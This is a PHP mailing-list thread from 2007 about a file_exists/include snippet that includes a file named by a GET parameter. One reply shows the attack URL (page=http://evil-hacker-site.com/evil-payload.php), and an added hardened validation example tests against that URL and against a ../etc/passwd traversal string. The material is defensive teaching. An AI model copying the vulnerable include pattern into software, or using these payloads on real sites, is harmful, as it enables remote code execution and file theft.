Instruct ICC wrote:
>
>
>> Date: Thu, 15 Nov 2007 00:20:52 +0000
>> From: stuttle@xxxxxxxxx
>> To: philthathril@xxxxxxxxx
>> CC: php-general@xxxxxxxxxxxxx
>> Subject: Re: file_exists
>>
>> Philip Thompson wrote:
>>> I've run into similar problems where I *thought* I was looking in the
>>> correct location... but I wasn't. Take this for example....
>>>
>>> <?php
>>> $page = $_GET['page'];
>>> if (file_exists ("$page.php")) {
>>>     include ("$page.php");
>>> }
>>> ?>
>>
>> I really hope this is not a piece of production code. If it is then you
>> might want to think very hard about what it's doing. If you still can't
>> see a problem let me know!
>>
>
> Called like this?
>
> index.php?page=http://evil-hacker-site.com/evil-payload.php
>
> And the browser will probably url_encode for me if needed.

Yup, very dangerous. Obviously PHP can be configured to not include/require remote URIs, but as a defensive programmer you should at the very least ensure your $_GET['page'] var conforms to a validation regexp or something...

Col

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
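The validation Col suggests, written out as an added example. This is not code from the thread or from any of its participants; the pages directory, the allowlist and the function name `resolve_page` are assumptions chosen for illustration. It replaces the quoted `include("$page.php")` with a lookup that rejects URLs, traversal sequences and NUL bytes syntactically, then restricts the name to an explicit allowlist, then confirms the resolved file really lives under the pages directory.

```php
<?php
// Added example (not from the original thread): a hardened replacement for the
// quoted `include("$page.php")` pattern. Directory layout, allowlist and the
// function name are assumptions made for illustration.

declare(strict_types=1);

// Hypothetical directory that holds the includable page scripts.
const PAGES_DIR = __DIR__ . '/pages';

// Explicit allowlist of page names. Stricter than a regex alone: the request
// can only select among files you deliberately made includable.
const ALLOWED_PAGES = ['home', 'about', 'contact'];

/**
 * Validate an untrusted page parameter and return the absolute path of the
 * script to include, or null if the request must be refused.
 *
 * Three independent checks, so a mistake in one does not reopen the hole:
 *   1. syntactic:  only [a-z0-9_-], so no "/", "..", ":", "http://" or NUL
 *   2. semantic:   the name must be on the allowlist
 *   3. filesystem: the resolved path must still sit inside PAGES_DIR
 */
function resolve_page(string $requested): ?string
{
    // 1. Reject anything but a short lowercase identifier. \A and \z anchor
    //    the whole string, so a trailing newline does not slip through.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }

    // 2. Only names we chose to expose. Strict comparison: no type juggling.
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;
    }

    // 3. Resolve symlinks and confirm containment under the pages directory.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }

    return $path;
}

// Usage in place of the quoted snippet. The is_string() guard matters because
// ?page[]=x makes $_GET['page'] an array, which must not reach include().
//
//   $page = $_GET['page'] ?? 'home';
//   $path = resolve_page(is_string($page) ? $page : '');
//   if ($path === null) {
//       http_response_code(404);
//       exit;
//   }
//   include $path;

// Constructed inputs: the thread's remote URL plus local variants. All of them
// are refused; 'home' is accepted once pages/home.php exists.
$samples = [
    'home',
    'http://evil-hacker-site.com/evil-payload.php',
    '../../../../etc/passwd',
    "home\0",
    'about.php',
];
foreach ($samples as $s) {
    printf("%-48s => %s\n", var_export($s, true), resolve_page($s) ?? 'REFUSED');
}
```

Turning off remote includes in php.ini (`allow_url_include = Off`, and `allow_url_fopen = Off` where nothing needs it) is still worth doing, but treat it as defence in depth rather than the fix: with remote URLs blocked, the quoted code will still include any local `.php` file that a `../` sequence can reach, which is why the input validation has to come first.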